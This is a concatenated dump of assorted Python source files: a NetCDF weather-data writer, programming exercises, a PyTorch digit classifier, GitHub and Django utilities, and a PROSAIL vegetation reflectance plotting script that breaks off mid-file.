sea_surface_air_pressure\n self.surface_downward_sensible_heat_flux = surface_downward_sensible_heat_flux\n self.surface_downward_latent_heat_flux = surface_downward_latent_heat_flux\n self.surface_air_temperature = surface_air_temperature\n self.dewpoint_temperature = dewpoint_temperature\n self.surface_downward_solar_radiation = surface_downward_solar_radiation\n self.surface_solar_radiation = surface_solar_radiation\n self.surface_thermal_radiation = surface_thermal_radiation\n self.surface_downward_thermal_radiation = surface_downward_thermal_radiation\n self.total_rain=total_rain\n self.ncfile = None\n self.update = update;\n\n if self.update == False :\n self.ncfile = Dataset(self.filename, 'w', format='NETCDF4')\n else:\n self.ncfile = Dataset(self.filename, 'r+', format='NETCDF4')\n\n self.ncfile.description = 'ECMWF Writer. Generated with pySpatialETL'\n\n if self.update == False:\n # dimensions\n self.ncfile.createDimension('time', None)\n self.ncfile.createDimension('lat', len(self.y_axis))\n self.ncfile.createDimension('lon', len(self.x_axis))\n\n # variables\n times = self.ncfile.createVariable('time', float64, ('time',))\n times.units= 'seconds since 2008-01-29 00:00:00'\n times.calendar= 'gregorian'\n times.standard_name= 'time'\n times.axis='T'\n times.conventions = \"UTC time\"\n\n latitudes = self.ncfile.createVariable('lat', float32, ('lat',))\n latitudes.units = \"degree_north\" ;\n latitudes.long_name = \"latitude\" ;\n latitudes.standard_name = \"latitude\" ;\n latitudes.valid_min = -90.0;\n latitudes.valid_max = 90.0 ;\n latitudes.axis = \"Y\" ;\n\n longitudes = self.ncfile.createVariable('lon', float32, ('lon',))\n longitudes.units = \"degree_east\" ;\n longitudes.long_name = \"longitude\" ;\n longitudes.standard_name = \"longitude\" ;\n longitudes.valid_min = -180.0 ;\n longitudes.valid_max = 180.0 ;\n longitudes.axis = \"X\" ;\n\n # data\n latitudes[:] = self.y_axis;\n longitudes[:] = self.x_axis;\n times[:] = date2num(self.t_axis,units = times.units, calendar = times.calendar);\n\n def close(self):\n self.ncfile.close()\n\n def write_variable_3D_mask(self):\n\n var = self.ncfile.createVariable('LSM', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Land/sea mask\";\n var.code = 172;\n var.table = 128;\n var[::] = 0\n\n def write_variable_surface_pressure(self):\n\n if self.update == False:\n var = self.ncfile.createVariable('SP', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface pressure\";\n var.code = 134;\n var.table = 128;\n var.units = \"Pa\";\n else:\n var = self.ncfile.variables['SP'];\n\n var[:] = self.surface_air_pressure*100;\n\n def write_variable_sea_surface_air_pressure(self):\n\n if self.update == False:\n var = self.ncfile.createVariable('MSL', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Sea surface air pressure\";\n var.code = 134;\n var.table = 128;\n var.units = \"Pa\";\n else:\n var = self.ncfile.variables['MSL'];\n\n var[:] = self.sea_surface_air_pressure*100;\n\n def write_variable_wind(self):\n\n if self.update == False:\n data_u = self.ncfile.createVariable('U10M', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n data_u.long_name = \"10 metre U wind component\";\n data_u.code = 147;\n data_u.table = 128;\n data_u.units = \"m s**-1\";\n\n data_v = self.ncfile.createVariable('V10M', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n data_v.long_name = \"10 metre V wind component\";\n data_v.code = 147;\n data_v.table = 128;\n data_v.units = \"m s**-1\";\n else :\n data_u = self.ncfile.variables['U10M']\n data_v = self.ncfile.variables['V10M']\n\n #data_u[:] = 270. - (math.degrees(self.wind_speed*math.sin(math.radians(self.wind_to_direction_angle)))) + 180.0 % 360.0\n #data_v[:] = 270. - (math.degrees(self.wind_speed*math.cos(math.radians(self.wind_to_direction_angle)) + 180.0 % 360.0\n\n data_u[:] = self.wind_speed * math.sin(math.radians((self.wind_from_direction_angle + 180.0) % 360.0))\n data_v[:] = self.wind_speed * math.cos(math.radians((self.wind_from_direction_angle + 180.0) % 360.0))\n\n def write_variable_surface_downward_sensible_heat_flux(self):\n\n if self.update == False:\n var = self.ncfile.createVariable('SSHF', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface sensible heat flux\";\n var.code = 146;\n var.table = 128;\n var.units = \"W m**-2 s\";\n else:\n var = self.ncfile.variables['SSHF']\n\n var[:] = self.surface_downward_sensible_heat_flux;\n\n def write_variable_surface_downward_latent_heat_flux(self):\n\n var = self.ncfile.createVariable('SLHF', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface latent heat flux\";\n var.code = 147;\n var.table = 128;\n var.units = \"W m**-2 s\";\n var[:] = self.surface_downward_latent_heat_flux;\n\n def write_variable_surface_air_temperature(self):\n\n var = self.ncfile.createVariable('T2M', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"2 metre temperature\";\n var.code = 167;\n var.table = 128;\n var.units = \"K\";\n var[:] = self.surface_air_temperature;\n\n def write_variable_dewpoint_temperature(self):\n\n var = self.ncfile.createVariable('D2M', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"2 metre dewpoint temperature\";\n var.code = 168;\n var.table = 128;\n var.units = \"K\";\n # Value\n var[:] = self.dewpoint_temperature;\n\n def write_variable_surface_downward_solar_radiation(self):\n\n var = self.ncfile.createVariable('SSRD', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface solar radiation downwards\";\n var.code = 169;\n var.table = 128;\n var.units = \"W m**-2 s\";\n var[:] = self.surface_downward_solar_radiation;\n\n def write_variable_surface_downward_thermal_radiation(self):\n\n var = self.ncfile.createVariable('STRD', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface thermal radiation downwards\";\n var.code = 175;\n var.table = 128;\n var.units = \"W m**-2 s\";\n var[:] = self.surface_downward_thermal_radiation;\n\n def write_variable_surface_solar_radiation(self):\n\n var = self.ncfile.createVariable('SSR', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface solar radiation\";\n var.code = 176;\n var.table = 128;\n var.units = \"W m**-2 s\";\n var[:] = self.surface_solar_radiation;\n\n def write_variable_surface_thermal_radiation(self):\n\n var = self.ncfile.createVariable('STR', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Surface thermal radiation\";\n var.code = 177;\n var.table = 128;\n var.units = \"W m**-2 s\";\n var[:] = self.surface_thermal_radiation;\n\n def write_variable_rainfall_amount(self):\n\n var = self.ncfile.createVariable('TP', float32, ('time', 'lat', 'lon',), fill_value=9.96921e+36)\n var.long_name = \"Total precipitation\";\n var.code = 228;\n var.table = 128;\n var.units = \"m\";\n var[:] = self.total_rain;","sub_path":"spatialetl/coverage/io/netcdf/ecmwf/AcademicECMWFWriter.py","file_name":"AcademicECMWFWriter.py","file_ext":"py","file_size_in_byte":10042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"364071458","text":"# 整型\n# 定义:年龄、手机号码、身份证(X除外)\na = 1 # a = int(1)\n\n# b = '12'\n# print(type(b))\n# b = int(b)\n# print(type(b))\n\n# 浮点型\n# 定义:体重、升高、薪资\n\nf1 = 1.9 # f1 = float(1.9)\n# print(type(f1))\n#\n# f2 = '1.9'\n# f2 = float(f2)\n# print(type(f2))\n\n# f2 = int(f2)\n# print(f2)\n# print(type(f2))\n\n# 复数\n\"\"\"\n>>> a = 1-2j\n>>> a\n(1-2j)\n>>> type(a)\n\n>>>\n>>>\n>>> a.real\n1.0\n>>> a.imag\n-2.0\n>>>\n\"\"\"\n\n\n# python2与python3的区别\n\n\"\"\"\npython2\n这个范围[-24xxxxxxxx,24xxxxxxxx],就叫int\n超过这个范围:long\n\npython3:\n没有长整型这么一说\n\"\"\"","sub_path":"2.python/0.python基础/day3/代码/数字类型.py","file_name":"数字类型.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"615575781","text":"from __future__ import generators\nfrom collections import defaultdict\n\nclass priorityDictionary(dict):\n def __init__(self):\n '''Initialize priorityDictionary by creating binary heap\nof pairs (value,key). Note that changing or removing a dict entry will\nnot remove the old pair from the heap until it is found by smallest() or\nuntil the heap is rebuilt.'''\n self.__heap = []\n dict.__init__(self)\n\n def smallest(self):\n '''Find smallest item after removing deleted items from heap.'''\n #if len(self) == 0:\n # raise IndexError, \"smallest of empty priorityDictionary\"\n heap = self.__heap\n while heap[0][1] not in self or self[heap[0][1]] != heap[0][0]:\n lastItem = heap.pop()\n insertionPoint = 0\n while 1:\n smallChild = 2*insertionPoint+1\n if smallChild+1 < len(heap) and \\\n heap[smallChild] > heap[smallChild+1]:\n smallChild += 1\n if smallChild >= len(heap) or lastItem <= heap[smallChild]:\n heap[insertionPoint] = lastItem\n break\n heap[insertionPoint] = heap[smallChild]\n insertionPoint = smallChild\n return heap[0][1]\n\n def __iter__(self):\n '''Create destructive sorted iterator of priorityDictionary.'''\n def iterfn():\n while len(self) > 0:\n x = self.smallest()\n yield x\n del self[x]\n return iterfn()\n\n def __setitem__(self,key,val):\n '''Change value stored in dictionary and add corresponding\npair to heap. Rebuilds the heap if the number of deleted items grows\ntoo large, to avoid memory leakage.'''\n dict.__setitem__(self,key,val)\n heap = self.__heap\n if len(heap) > 2 * len(self):\n self.__heap = [(v,k) for k,v in self.iteritems()]\n self.__heap.sort() # builtin sort likely faster than O(n) heapify\n else:\n newPair = (val,key)\n insertionPoint = len(heap)\n heap.append(None)\n while insertionPoint > 0 and \\\n newPair < heap[(insertionPoint-1)//2]:\n heap[insertionPoint] = heap[(insertionPoint-1)//2]\n insertionPoint = (insertionPoint-1)//2\n heap[insertionPoint] = newPair\n\n def setdefault(self,key,val):\n '''Reimplement setdefault to call our customized __setitem__.'''\n if key not in self:\n self[key] = val\n return self[key]\n\ndef dks(G, start, end):\n D = {}\t# dictionary of final distances\n p = {}\t# dictionary of predecessors\n Q = priorityDictionary() # est.dist. of non-final vert.\n Q[start] = 0\n\n for v in Q:\n D[v] = Q[v]\n if v == end: break\n for w in G[v]:\n vwLength = D[v] + G[v][w]\n if w in D:\n if vwLength < D[w]:\n raise(ValueError,\"Dijkstra: found better path to already-final vertex\")\n elif w not in Q or vwLength < Q[w]:\n Q[w] = vwLength\n P[w] = v\n return (D,P)\n\n\nfor _ in range(int(input())):\n n, m = [int(x) for x in input().split()]\n bridges = defaultdict(list)\n for _ in range(m):\n a, b = [int(x) for x in input().split()]\n bridges[a].append(b)\n bridges[b].append(a)\n d, p = dks(bridges,1, n)\n\n\n","sub_path":"Hackerrank/rocky_village.py","file_name":"rocky_village.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72806040","text":"import myutil as mu\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import TensorDataset # 텐서데이터셋\nfrom torch.utils.data import DataLoader # 데이터로더\nfrom torch.utils.data import Dataset\nimport matplotlib.pyplot as plt # 맷플롯립사용\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nimport random\nfrom sklearn.datasets import load_digits\n\n################################################################################\n# - 다층 퍼셉트론으로 손글씨 분류하기\n# - 이번 챕터에서는 다층 퍼셉트론을 구현하고, 딥 러닝을 통해서 숫자 필기 데이터를 분류해봅시다.\n# - MNIST 데이터랑 다른 데이터입니다.\n\n################################################################################\n# - 숫자 필기 데이터 소개\n# - 숫자 필기 데이터는 사이킷런 패키지에서 제공하는 분류용 예제 데이터입니다.\n# - 0부터 9까지의 숫자를 손으로 쓴 이미지 데이터로 load_digits() 명령으로 로드할 수 있습니다.\n# - 각 이미지는 0부터 15까지의 명암을 가지는 8 × 8 = 64 픽셀 해상도의 흑백 이미지입니다.\n# - 그리고 해당 이미지가 1,797개가 있습니다.\n# - load_digits()를 통해 이미지 데이터를 로드할 수 있습니다.\n# - 로드한 전체 데이터를 digits에 저장합니다.\n\n\ndigits = load_digits()\nmu.log(\"len(digits.images)\", len(digits.images))\n\nimages_labels = list(zip(digits.images, digits.target))\nsub_sample_size = 20\n\nfor i, (image, label) in enumerate(images_labels[:sub_sample_size]):\n plt.subplot(4, 5, i + 1)\n plt.axis(\"off\")\n plt.imshow(image, cmap=plt.cm.gray_r, interpolation=\"nearest\")\n plt.title(\"label : {}\".format(label))\n\nplt.show()\n\n################################################################################\n# - 다층 퍼셉트론 분류기 만들기\n\n\nmodel = nn.Sequential(\n nn.Linear(64, 32), # input_layer = 64, hidden_layer1 = 32\n nn.ReLU(),\n nn.Linear(32, 16), # hidden_layer2 = 32, hidden_layer3 = 16\n nn.ReLU(),\n nn.Linear(16, 10) # hidden_layer3 = 16, output_layer = 10\n)\n\nmu.log(\"model\", model)\n\nX = digits.data # 이미지. 즉, 특성 행렬\nY = digits.target # 각 이미지에 대한 레이블\n\nmu.log(\"len(X)\", len(X))\nmu.log(\"X[0].shape\", X[0].shape)\nmu.log(\"len(Y)\", len(Y))\nmu.log(\"Y[0].shape\", Y[0].shape)\n\nX = torch.tensor(X, dtype=torch.float32)\nY = torch.tensor(Y, dtype=torch.int64)\n\nloss_fn = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters())\nnb_epochs = 100\nmu.plt_init()\n\nfor epoch in range(nb_epochs + 1):\n y_pred = model(X)\n loss = loss_fn(y_pred, Y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if epoch % 10 == 0:\n accuracy = mu.get_cross_entropy_accuracy(y_pred, Y)\n mu.log_epoch(epoch, nb_epochs, loss, accuracy)\n\nmu.plt_show()\n\nmu.log(\"model\", model)\n\n################################################################################\n# accuracy 측정\n\n\nwith torch.no_grad():\n prediction = model(X)\n accuracy = mu.get_cross_entropy_accuracy(prediction, Y)\n mu.log(\"accuracy\", accuracy)\n\n################################################################################\n# 랜덤 5 항목 테스트\n\n\nfor _ in range(5):\n print(\"-\" * 80)\n r = random.randint(0, len(X) - 1)\n mu.log(\"r\", r)\n X_single_data = X[r:r + 1]\n mu.log(\"X_single_data.shape\", X_single_data.shape)\n Y_single_data = Y[r:r + 1]\n mu.log(\"Y_single_data\", Y_single_data)\n single_prediction = model(X_single_data)\n mu.log(\"single_prediction\", single_prediction)\n single_prediction_res = torch.argmax(single_prediction, 1).item()\n mu.log(\"single_prediction_res\", single_prediction_res)\n mu.plt_img_show(X_single_data.view(8, 8))\n","sub_path":"0607_multi_layer_perceptron_sklearn.py","file_name":"0607_multi_layer_perceptron_sklearn.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"487136406","text":"import argparse\nimport json\n\nimport numpy as np\n\ndef add_arguments(parser):\n parser.add_argument(\"--input_file\", help=\"path to input file\", required=True)\n parser.add_argument(\"--output_file\", help=\"path to output file\", required=True)\n parser.add_argument(\"--answer_threshold\", help=\"threshold of answer\", required=False, default=0.1, type=float)\n\ndef convert_coqa(input_file,\n output_file,\n answer_threshold):\n with open(input_file, \"r\") as file:\n input_data = json.load(file)\n \n output_data = []\n for data in input_data:\n id_items = data[\"qas_id\"].split('_')\n id = id_items[0]\n turn_id = int(id_items[1])\n \n prob_list = [data[\"unk_prob\"], data[\"yes_prob\"], data[\"no_prob\"]]\n answer_list = [\"unknown\", \"yes\", \"no\"]\n \n prob_idx = np.argmax(prob_list)\n if prob_list[prob_idx] >= answer_threshold:\n answer = answer_list[prob_idx]\n if answer == \"yes\" and \"true or false\" in data[\"question_text\"].lower():\n answer = \"true\"\n elif answer == \"no\" and \"true or false\" in data[\"question_text\"].lower():\n answer = \"false\"\n else:\n answer = data[\"predict_text\"]\n \n score = prob_list[prob_idx]\n \n output_data.append({\n \"id\": id,\n \"turn_id\": turn_id,\n \"answer\": answer,\n \"score\": score\n })\n \n with open(output_file, \"w\") as file:\n json.dump(output_data, file, indent=4)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n add_arguments(parser)\n args = parser.parse_args()\n convert_coqa(args.input_file, args.output_file, args.answer_threshold)\n","sub_path":"tool/convert_coqa.py","file_name":"convert_coqa.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"481432412","text":"import tensorflow as tf\nimport numpy as np\n\n\nx = tf.Variable(tf.random_normal([1,2,6,1]))\ny = tf.squeeze(x, axis=[0])\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n\n print(\"x shape\", x.get_shape().as_list())\n print(\"y shape\", y.get_shape().as_list())\n","sub_path":"ga3c/test_tensorflow.py","file_name":"test_tensorflow.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"42402414","text":"#! /usr/bin/env python3\n\nfrom itertools import product\nimport sys\n\ntaxa_mut = [0.005, 0.010]\ntaxa_cruz = [0.95, 0.99]\ntam_pop = [200, 400, 800]\noperador_cruz = [0, 1]\noperador_mut = [0, 1]\nnumero_grupos = 1\n\ncombinacoes = list(product(tam_pop, taxa_cruz, operador_cruz, operador_mut,\n taxa_mut))\nnumero_combinacoes = len(combinacoes)\nprint('Numero de combinacoes: ', numero_combinacoes)\n\ncombinacoes_por_grupo = numero_combinacoes // numero_grupos\nprint('Combinacoes por grupo:', combinacoes_por_grupo)\n\n\ndef getid(c):\n return '.'.join(str(x) for x in c)\n\n\ndef comb2str(i, c):\n return 'ag ' + str(i) + '-' + getid(c) + ' ' + ' '.join(str(x) for x in c)\n\n\nid_grupo = int(sys.argv[1])\ncomeco_intervalo = id_grupo * combinacoes_por_grupo\nfim_intervalo = (id_grupo + 1) * combinacoes_por_grupo\n\nprint('Intervalo: [%d, %d)' % (comeco_intervalo, fim_intervalo))\n\nwith open('restantes.txt', 'w') as f:\n for i, c in enumerate(combinacoes[comeco_intervalo:fim_intervalo],\n comeco_intervalo):\n print(comb2str(i, c), file=f)\n\n","sub_path":"scripts/gerar_configuracoes_ag.py","file_name":"gerar_configuracoes_ag.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"61466472","text":"#!/usr/bin/env python3\n\n# Evaluating Code\n# Clarity first!\n# Maintainability (minimal repetition or dependencies)\n# Consistency (syntax, variable naming)\n# Brevity\n# At higher levels, and after the above:\n# Time efficiency\n# Memory efficiency\n\nclass MaxSizeList(object):\n def __init__(self, maxSize):\n self.l = []\n self.maxSize = maxSize\n\n def push(self, element):\n self.l.append(element)\n if (len(self.l) > self.maxSize):\n self.l.pop(0)\n\n def get_list(self):\n return self.l\n\na = MaxSizeList(3)\nb = MaxSizeList(1)\n\na.push(\"hey\")\na.push(\"hi\")\na.push(\"let's\")\na.push(\"go\")\n\nb.push(\"hey\")\nb.push(\"hi\")\nb.push(\"let's\")\nb.push(\"go\")\n\nprint(a.get_list())\nprint(b.get_list())\n","sub_path":"OOP/008. Assignment 1.py","file_name":"008. Assignment 1.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"453358786","text":"# 2. Посчитать четные и нечетные цифры введенного натурального числа.\n# Например, если введено число 34560, то у него 3 четные цифры (4, 6 и 0)\n# и 2 нечетные (3 и 5).\n\nEVEN_NUMS = 0\nODD_NUMS = 0\n\n\n# ---Цикл---\ndef counting_cycle(a):\n even_nums = 0\n odd_nums = 0\n while a != 0:\n numb = a % 10 # Получаем крайнее правое число\n a = a // 10 # Убираем крайнее правое число\n if numb % 2 == 0:\n even_nums += 1\n else:\n odd_nums += 1\n print(f'Кол-во четных чисел: {even_nums}\\n'\n f'Кол-во нечетных чисел: {odd_nums}')\n\n\n# ---Рекурсия---\ndef counting_req(a):\n global EVEN_NUMS, ODD_NUMS\n if a == 0:\n return print(f'Кол-во четных чисел: {EVEN_NUMS}\\n'\n f'Кол-во нечетных чисел: {ODD_NUMS}')\n numb = a % 10\n if numb % 2 == 0:\n EVEN_NUMS += 1\n else:\n ODD_NUMS += 1\n return counting_req(a // 10)\n\n\nif __name__ == '__main__':\n A = int(input('Введите натуральное число:\\n'))\n counting_cycle(A)\n counting_req(A)\n","sub_path":"lesson_2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"240227770","text":"import requests\nimport sys\nfrom datetime import datetime, timedelta\n\nGITHUB_SEARCH_REPOS = 'https://api.github.com/search/repositories'\n\n\ndef get_last_week_date():\n today = datetime.today()\n today = datetime.date(today)\n last_week = today - timedelta(days=7)\n last_week = last_week.isoformat()\n return last_week\n\n\ndef get_trending_repositories(top_size):\n last_week = get_last_week_date()\n params = {'q': 'created:>{0}'.format(last_week),\n 'sort': 'stars',\n 'per_page': top_size}\n request = requests.get(GITHUB_SEARCH_REPOS, params=params)\n trending_repos = request.json()\n return trending_repos.get('items')\n\n\ndef output_interesting_repositories(trending_repos, top_size):\n print('\\nTop {0} trending repos ordered by stars:\\n'.format(top_size))\n for repo in trending_repos:\n print('{0} \\nDescription: {1}'.format(repo.get('name'), repo.get('description')))\n print('Stars: {0} \\nOpen issues: {1}'.format(repo.get('stargazers_count'), repo.get('open_issues_count')))\n print('Link: {0} \\n'.format(repo.get('html_url')))\n\n\nif __name__ == '__main__':\n try:\n top_size = int(sys.argv[1])\n except:\n top_size = 100\n list_trending_repos = get_trending_repositories(top_size)\n output_interesting_repositories(list_trending_repos, top_size)\n","sub_path":"github_trending.py","file_name":"github_trending.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"251194998","text":"class Solution:\n def minDistance(self, height, width, tree, squirrel, nuts):\n \"\"\"\n :type height: int\n :type width: int\n :type tree: List[int]\n :type squirrel: List[int]\n :type nuts: List[List[int]]\n :rtype: int\n \"\"\"\n def distance(x, y):\n return abs(x[0] - y[0]) + abs(x[1] - y[1])\n\n\n mindis, first = 999999999, 0\n for i, nut in enumerate(nuts):\n if distance(squirrel, nut) - distance(tree, nut) < mindis:\n mindis = distance(squirrel, nut) - distance(tree, nut)\n first = i\n\n ans = mindis + sum(2 * distance(tree, nut) for i, nut in enumerate(nuts))\n return ans\n","sub_path":"leetcode/573. Squirrel Simulation.py","file_name":"573. Squirrel Simulation.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"217600602","text":"from google.appengine.api import users\nfrom google.appengine.api import channel\n\nimport json\nimport webapp2\nfrom random import randint\n\n\nclass checkCredentials(webapp2.RequestHandler):\n def get(self):\n \n tokensalt = randint(1561, 8644242454)\n mytoken = 'ebiduh' + str(tokensalt)\n token = channel.create_channel(mytoken)\n data = { 'token':token, 'clientID':mytoken }\n self.response.out.write(json.dumps(data))\n \n \nclass doNothing(webapp2.RequestHandler):\n def get(self):\n self.response.out.write('successfully did nothing...')\n \n \n \n\n\napp = webapp2.WSGIApplication([\n ('/app/authenticate', checkCredentials),\n ('/app/donothing', doNothing),\n ],debug=True) ","sub_path":"app/authenticate.py","file_name":"authenticate.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"213776907","text":"from django.forms.models import modelformset_factory\nimport requests\nimport json\n\nfrom django.shortcuts import render\nfrom django.http.response import HttpResponse\nfrom django.forms.formsets import formset_factory\n\nfrom forms import TestRESTForm, TYPE_REQUEST_CHOICES, AddUsersForm\nfrom models import MyUser\n\n\ndef requests_view(request):\n if request.method == 'GET':\n context = {}\n context['form'] = TestRESTForm()\n return render(request, 'rest_app/index.html', context)\n\n elif request.method == 'POST':\n form = TestRESTForm(request.POST)\n context = {}\n info = ''\n if form.is_valid():\n type_request = dict(TYPE_REQUEST_CHOICES).get(int(request.POST.get('type_request')))\n if type_request == 'GET':\n try:\n info = requests.get(request.POST.get('request')).content\n info = json.loads(info)\n info = json.dumps(info, indent=4, sort_keys=True)\n except:\n info = 'Please try again'\n elif type_request == 'POST':\n try:\n if request.POST.get('request').count('?') == 1:\n url, data = request.POST.get('request').split('?')\n data = json.loads(data)\n headers = {'content-type': 'application/json'}\n info = requests.post(url, data=json.dumps(data), headers=headers)\n if str(info) == '':\n info = 'data is changed'\n else:\n info = 'Please try again'\n except:\n info = 'Please try again'\n elif type_request == 'DELETE':\n try:\n url = request.POST.get('request')\n info = requests.delete(url=url)\n if str(info) == '':\n info = 'ID does not exist'\n else:\n info = 'Record is deleted'\n except:\n info = 'Please try again'\n context['info'] = info\n\n context['form'] = form\n data = json.dumps({'info': info, 'errors': str(form.errors)})\n return HttpResponse(data, content_type=\"application/json\")\n\n\ndef add_users_view(request):\n if request.method == 'GET':\n context = {}\n context['form'] = formset_factory(AddUsersForm, extra=5)\n return render(request, 'rest_app/add_users.html', context)\n\n elif request.method == 'POST':\n context = {}\n AddUsersFormset = modelformset_factory(MyUser, form=AddUsersForm, extra=5)\n formset = AddUsersFormset(request.POST)\n if formset.is_valid():\n formset.save()\n context['form'] = formset_factory(AddUsersForm, extra=5)\n return render(request, 'rest_app/add_users.html', context)\n\n","sub_path":"rest_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"382088905","text":"# Import the model class\n# This is just to show how the module works\n\nfrom prosail2 import Prosail\nimport pdb\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom BRDF import est_spec\nimport cProfile\nimport matplotlib.colors as mcolors\n\ndef main():\n #pdb.set_trace()\n # nothing happens, but it gives access to stuff\n p = Prosail()\n wvs = p.wl\n# #def run(self, N, Cab, Car, Cbrown, Cw, Cm, LAI, psoil, hspot, tts, tto, psi, LIDF, outname=None, Py6S=False):\n \n # Common leaf distributions\n Planophile = (1, 0)\n Erectophile = (-1, 0)\n Plagiophile = (0, -1)\n Extremophile = (0, 1)\n Spherical = (-0.35, -0.15)\n \n # psi is the relative azimuth angle\n cnf_template = {'N': 1.5, 'Cab': 40, 'Car': 8, 'Cbrown': 0, 'Cw': 0.01, \\\n 'Cm': 0.009, 'LAI': 3, 'psoil': 0, 'hspot': 0.5, 'tts': 45, 'tto':1, 'psi':30, 'LIDF': Planophile}\n \n cnf_template = {'N': 2.0, 'Cab': 50, 'Car': 10, 'Cbrown': 0.1, 'Cw': 0.02, \\\n 'Cm': 0.015, 'LAI': 5, 'psoil': 0.3, 'hspot': 0.8, 'tts': 30, 'tto': 2, 'psi': 45, 'LIDF': 'Erectophile'}\n \n cnf_template = {'N': 1.5, 'Cab': 45, 'Car': 15, 'Cbrown': 0.2, 'Cw': 0.03, \\\n 'Cm': 0.02, 'LAI': 2, 'psoil': 0.2, 'hspot': 0.5, 'tts': 40, 'tto': 1, 'psi': 60, 'LIDF': 'Spherical'}\n \n cnf_template_corn = {'N': 1.5, 'Cab': 45, 'Car': 8, 'Cbrown': 0.2, 'Cw': 0.03, \\\n 'Cm': 0.02, 'LAI': 2, 'psoil': 0.2, 'hspot': 0.1, 'tts': 45, 'tto': 30, \\\n 'psi': 60, 'LIDFa': Erectophile[0], 'LIDFb': Erectophile[1]}\n\n\n #spc = p.run(cnf_template_corn)\n #spc = p.run(cnf_template)\n #plt.plot(p.wl, spc, label='Corn')\n #plt.savefig('img.jpg')\n \n\n # produce a bunch of different Cab levels:\n # Define colormap\n\n\n ##### CHLOROPHIL\n colors = ['#D2B48C', '#90EE90', '#008000', '#006400']\n cmap = mcolors.LinearSegmentedColormap.from_list('custom_colormap', colors)\n\n # Create a list of Cab values\n Cab_values = np.arange(20, 100, 7.5)\n\n for i, Cab in enumerate(Cab_values):\n color=cmap(i / (len(np.arange(20, 100, 10)) - 1))\n cnf_template_corn['Cab'] = Cab\n spc = p.run(cnf_template_corn)\n plt.plot(p.wl, spc, label=\"Cab = {}\".format(Cab), color=color)\n\n # Create a colorbar\n sm = plt.cm.ScalarMappable(cmap=cmap)\n sm.set_array(Cab_values)\n cbar = plt.colorbar(sm)\n cbar.set_label('Cab')\n\n plt.ylim((0, 0.3))\n plt.grid()\n plt.xlabel('Wavelengths (nm)')\n plt.ylabel('HDRF')\n #plt.title('Spectrum Plot')\n plt.savefig('img.jpg')\n #pdb.set_trace()\n\n plt.figure()\n # Define the custom colormap\n cmap = mcolors.LinearSegmentedColormap.from_list('custom_colormap', ['#964B00', '#00BFFF'])\n\n\n ##### Liquid Water\n # Create a list of Cw values\n Cw_values = np.arange(0.01, 0.1, 0.01)\n\n # Iterate over Cw values\n for i, Cw in enumerate(Cw_values):\n cnf_template_corn['Cw'] = Cw\n spc = p.run(cnf_template_corn)\n plt.plot(p.wl, spc, color=cmap(i / (len(Cw_values) - 1)))\n\n # Create a colorbar\n sm = plt.cm.ScalarMappable(cmap=cmap)\n sm.set_array(Cw_values)\n cbar = plt.colorbar(sm)\n cbar.set_label('Cw')\n plt.ylim((0, 0.3))\n plt.grid()\n plt.xlabel('Wavelengths (nm)')\n plt.ylabel('HDRF')\n #plt.title('Spectrum Plot')\n plt.savefig('Cw.jpg')\n #pdb.set_trace()\n\n\n ###### BROWN PIGMENT\n plt.figure()\n cmap = mcolors.LinearSegmentedColormap.from_list('custom_colormap', ['#008000', '#A52A2A'])\n # Create a list of Cw values\n Cbrown_values = 